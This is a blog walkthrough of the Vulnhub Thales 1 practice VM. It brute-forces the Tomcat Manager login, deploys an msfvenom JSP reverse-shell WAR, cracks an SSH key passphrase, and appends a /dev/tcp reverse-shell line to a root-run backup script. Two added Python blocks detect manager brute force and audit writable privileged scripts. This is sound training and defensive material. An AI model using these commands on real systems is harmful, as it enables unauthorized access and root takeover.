Vulnhub Thales 1 box: detailed walkthrough (getting the shell manually, without Metasploit)

Thales 1

Identifying the target host IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:69:82:43      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.207  08:00:27:db:3e:b3      1      60  PCS Systemtechnik GmbH         

Kali Linux's netdiscover identified the target host IP address as 192.168.56.207.

NMAP scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.207 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-06 20:22 EST
Nmap scan report for localhost (192.168.56.207)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8c:19:ab:91:72:a5:71:d8:6d:75:1d:8f:65:df:e1:32 (RSA)
|   256 90:6e:a0:ee:d5:29:6c:b9:7b:05:db:c6:82:5c:19:bf (ECDSA)
|_  256 54:4d:7b:e8:f9:7f:21:34:3e:ed:0f:d9:fe:93:bf:00 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.52
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.52
MAC Address: 08:00:27:DB:3E:B3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.08 seconds

The NMAP scan shows the target has two open ports: 22 (ssh) and 8080 (http).

Getting a shell

Visiting port 8080 in a browser returns the Apache Tomcat default page; clicking Manager App or Host Manager on that page pops up an HTTP Basic authentication prompt.

Can Metasploit crack this basic authentication?

msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options 

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                   Required  Description
   ----              ---------------                   --------  -----------
   BLANK_PASSWORDS   false                             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                 yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                             no        Try each user/password couple stored in the current databa
                                                                 se
   DB_ALL_PASS       false                             no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                             no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                              no        Skip existing credentials stored in the current database (
                                                                 Accepted: none, user, user&realm)
   PASSWORD                                            no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/  no        File containing passwords, one per line
                     data/wordlists/tomcat_mgr_defaul
                     t_pass.txt
   Proxies                                             no        A proxy chain of format type:host:port[,type:host:port][..
                                                                 .]
   RHOSTS                                              yes       The target host(s), see https://github.com/rapid7/metasplo
                                                                 it-framework/wiki/Using-Metasploit
   RPORT             8080                              yes       The target port (TCP)
   SSL               false                             no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                             yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                     yes       URI for Manager login. Default is /manager/html
   THREADS           1                                 yes       The number of concurrent threads (max one per host)
   USERNAME                                            no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/  no        File containing users and passwords separated by space, on
                     data/wordlists/tomcat_mgr_defaul            e pair per line
                     t_userpass.txt
   USER_AS_PASS      false                             no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/  no        File containing users, one per line
                     data/wordlists/tomcat_mgr_defaul
                     t_users.txt
   VERBOSE           true                              yes       Whether to print output for all attempts
   VHOST                                               no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.56.207
RHOSTS => 192.168.56.207
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!

[-] 192.168.56.207:8080 - LOGIN FAILED: role:r00t (Incorrect)


[+] 192.168.56.207:8080 - Login Successful: tomcat:role1


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


With the cracked username and password, logging in to the Tomcat Manager succeeds.
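The credential guessing above leaves a recognisable trail in Tomcat's access log: a burst of 401 responses on /manager/html from one client. The detector below is an added example, not part of the original write-up; it assumes the default AccessLogValve "common" pattern and runs over constructed log lines.

```python
# Added example: flag clients hammering the Tomcat Manager with bad credentials.
# Parses Tomcat AccessLogValve "common" lines: %h %l %u %t "%r" %s %b
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return (ip, timestamp, path, status) or None if the line does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return (m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT),
            m.group("path"), int(m.group("status")))

def find_manager_bruteforce(lines, threshold=5, window_s=60):
    """Map ip -> max number of 401s on /manager/* seen inside any window_s-second span."""
    window = timedelta(seconds=window_s)
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[3] == 401 and rec[2].startswith("/manager/"):
            failures[rec[0]].append(rec[1])
    flagged = {}
    for ip, stamps in failures.items():
        stamps.sort()
        j, best = 0, 0
        for i, t in enumerate(stamps):       # sliding window over sorted timestamps
            while stamps[j] < t - window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

# Constructed sample log: six failed guesses, then a success, from the lab's Kali host.
SAMPLE_LOG = """\
192.168.56.146 - - [06/Mar/2023:20:30:01 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.146 - - [06/Mar/2023:20:30:01 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.146 - - [06/Mar/2023:20:30:02 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.146 - - [06/Mar/2023:20:30:02 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.146 - - [06/Mar/2023:20:30:03 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.146 - - [06/Mar/2023:20:30:03 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.146 - tomcat [06/Mar/2023:20:30:04 -0500] "GET /manager/html HTTP/1.1" 200 18953
192.168.56.1 - - [06/Mar/2023:20:31:10 -0500] "GET /manager/html HTTP/1.1" 401 -
""".splitlines()
```

On a real host, point it at Tomcat's localhost_access_log files; the threshold and window are tuning knobs, not fixed values.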

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ msfvenom --platform linux  -p linux/x86/shell/reverse_tcp LHOST=192.168.56.146 LPORT=5555 -f war -o shell.war 
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of war file: 1601 bytes
Saved as: shell.war

Generate shell.war with msfvenom, then deploy it to the backend through the Tomcat Manager.

But this did not work: the wrong payload was chosen; it needs to be a Java-type payload.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ msfvenom  -p java/jsp_shell_reverse_tcp LHOST=192.168.56.146 LPORT=5555 -f war -o shell2.war 
Payload size: 1095 bytes
Final size of war file: 1095 bytes
Saved as: shell2.war

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.207] 47200
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@miletus:/$ cd /home
cd /home
tomcat@miletus:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K Aug 15  2021 .
drwxr-xr-x 24 root   root   4.0K Oct 14  2021 ..
drwxr-xr-x  6 thales thales 4.0K Oct 14  2021 thales

At this point we have a shell on the target host.

tomcat@miletus:/home/thales$ ls -alh
ls -alh
total 52K
drwxr-xr-x 6 thales thales 4.0K Oct 14  2021 .
drwxr-xr-x 3 root   root   4.0K Aug 15  2021 ..
-rw------- 1 thales thales  457 Oct 14  2021 .bash_history
-rw-r--r-- 1 thales thales  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 thales thales 3.7K Apr  4  2018 .bashrc
drwx------ 2 thales thales 4.0K Aug 15  2021 .cache
drwx------ 3 thales thales 4.0K Aug 15  2021 .gnupg
drwxrwxr-x 3 thales thales 4.0K Aug 15  2021 .local
-rw-r--r-- 1 root   root    107 Oct 14  2021 notes.txt
-rw-r--r-- 1 thales thales  807 Apr  4  2018 .profile
-rw-r--r-- 1 root   root     66 Aug 15  2021 .selected_editor
drwxrwxrwx 2 thales thales 4.0K Aug 16  2021 .ssh
-rw-r--r-- 1 thales thales    0 Oct 14  2021 .sudo_as_admin_successful
-rw------- 1 thales thales   33 Aug 15  2021 user.txt
tomcat@miletus:/home/thales$ cat notes.txt
cat notes.txt
I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.
tomcat@miletus:/home/thales$ cd .ssh
cd .ssh
tomcat@miletus:/home/thales/.ssh$ ls -alh
ls -alh
total 16K
drwxrwxrwx 2 thales thales 4.0K Aug 16  2021 .
drwxr-xr-x 6 thales thales 4.0K Oct 14  2021 ..
-rw-r--r-- 1 thales thales 1.8K Aug 16  2021 id_rsa
-rw-r--r-- 1 thales thales  396 Aug 16  2021 id_rsa.pub
tomcat@miletus:/home/thales/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6103FE9ABCD5EF41F96C07F531922AAF
-----END RSA PRIVATE KEY-----
tomcat@miletus:/home/thales/.ssh$ 

There is an SSH private key for the thales user; copy it to the local Kali Linux machine and fix its permissions:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ vim id_rsa

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ chmod 400 id_rsa

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ ssh -i id_rsa thales@192.168.56.207
The authenticity of host '192.168.56.207 (192.168.56.207)' can't be established.
ED25519 key fingerprint is SHA256:/oYiS8GEqdiC3TtzLk8dXI7HihfzcX0aHGyd0nHJGnw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.207' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': 


┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ ssh2john id_rsa >hashes

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
vodka06          (id_rsa)     
1g 0:00:00:02 DONE (2023-03-06 21:29) 0.4424g/s 1265Kp/s 1265Kc/s 1265KC/s vodka1420..vodka0260
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ ssh -i id_rsa thales@192.168.56.207
Enter passphrase for key 'id_rsa': 
thales@192.168.56.207: Permission denied (publickey).

Although the passphrase was cracked, SSH login still fails with Permission denied.

So back to the backup.sh script mentioned in notes.txt:

tomcat@miletus:/home/thales$ echo "bash -c 'bash -i >& /dev/tcp/192.168.56.146/6666 0>&1'" >> /usr/local/bin/backup.sh

After a while, Kali Linux receives another shell from the target host.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ sudo nc -nlvp 6666                         
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.207] 43658
bash: cannot set terminal process group (1927): Inappropriate ioctl for device
bash: no job control in this shell
root@miletus:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@miletus:~# ls -alh
ls -alh
total 44K
drwx------  6 root root 4.0K Oct 14  2021 .
drwxr-xr-x 24 root root 4.0K Oct 14  2021 ..
-rw-------  1 root root  275 Oct 14  2021 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Oct 14  2021 .cache
drwx------  3 root root 4.0K Oct 14  2021 .gnupg
drwxr-xr-x  3 root root 4.0K Aug 15  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   33 Aug 15  2021 root.txt
-rw-r--r--  1 root root   66 Aug 15  2021 .selected_editor
drwx------  2 root root 4.0K Aug 15  2021 .ssh
root@miletus:~# cat root.txt
cat root.txt
3a1c85bebf8833b0ecae900fb8598b17
root@miletus:~# 

At this point we have a root shell and the root flag.
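The privilege escalation worked because a script that root executes (backup.sh, per notes.txt and the root shell that followed) could be modified by the unprivileged tomcat user. The audit below is an added defender's check, not code from the write-up: it flags scripts whose owner, permission bits or parent directory let someone other than the account running them change their contents. The temp-dir scenario and the script body are constructed.

```python
# Added example: audit scripts that a privileged job (cron, root's backup) runs
# but that unprivileged users could modify, the weakness behind backup.sh here.
import os
import stat
import tempfile

def check_privileged_script(path, runner_uid=0):
    """Return findings for a script executed by runner_uid (root by default).

    Flags: owner is not the runner, group- or world-writable file, or a
    world-writable parent directory without the sticky bit (file replaceable).
    """
    findings = []
    st = os.stat(path)
    if st.st_uid != runner_uid:
        findings.append(f"{path}: owned by uid {st.st_uid}, not the account that runs it")
    if st.st_mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable (gid {st.st_gid})")
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")
    parent = os.path.dirname(os.path.abspath(path))
    pmode = os.stat(parent).st_mode
    if pmode & stat.S_IWOTH and not pmode & stat.S_ISVTX:
        findings.append(f"{parent}: world-writable directory, file can be swapped")
    return findings

def audit(paths, runner_uid=0):
    """Run the check over several paths, skipping ones that do not exist."""
    return {p: check_privileged_script(p, runner_uid) for p in paths if os.path.exists(p)}

def demo():
    """Constructed scenario: one sane script and a backup.sh anyone can edit."""
    d = tempfile.mkdtemp()
    safe, weak = os.path.join(d, "safe.sh"), os.path.join(d, "backup.sh")
    for p in (safe, weak):
        with open(p, "w") as f:
            f.write("#!/bin/bash\ntar czf /tmp/home.tgz /home\n")  # hypothetical body
    os.chmod(d, 0o755)
    os.chmod(safe, 0o755)
    os.chmod(weak, 0o777)  # what the unprivileged append in the write-up implies
    # runner_uid is the current user so the demo works without root
    return {os.path.basename(p): f for p, f in audit([safe, weak], os.getuid()).items()}
```

On a real host, feed audit() the script paths referenced from /etc/crontab, /etc/cron.d and root's crontab, with the default runner_uid of 0.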

Lessons learned

  1. When using msfvenom, make full use of the help options:

    Use the following command to see which platforms are supported:

    $ msfvenom --list platforms
    

    Use the following command to see which payloads are supported; pipe through grep to filter for the payload you want, e.g. java:

    $ msfvenom --list payloads 
    

    Use the following command to see which options a given payload needs:

                                                                                                                                  
    ┌──(kali㉿kali)-[~]
    └─$ msfvenom -p java/jsp_shell_reverse_tcp --list-options
    Options for payload/java/jsp_shell_reverse_tcp:
    =========================
    
    
           Name: Java JSP Command Shell, Reverse TCP Inline
         Module: payload/java/jsp_shell_reverse_tcp
       Platform: Linux, OSX, Solaris, Unix, Windows
           Arch: java
    Needs Admin: No
     Total size: 0
           Rank: Normal
    
    Provided by:
        sf <stephen_fewer@harmonysecurity.com>
    
    Basic options:
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST                   yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
    SHELL                   no        The system shell to use.
    
    Description:
      Connect back to attacker and spawn a command shell
    
    

    Use the following command to see the supported output file formats:

    $ msfvenom --list formats
    
  2. For this box, the payload type must first be chosen correctly (java) and the output format must be war; otherwise deployment fails.

posted @ 2023-03-07 10:54  Jason_huawen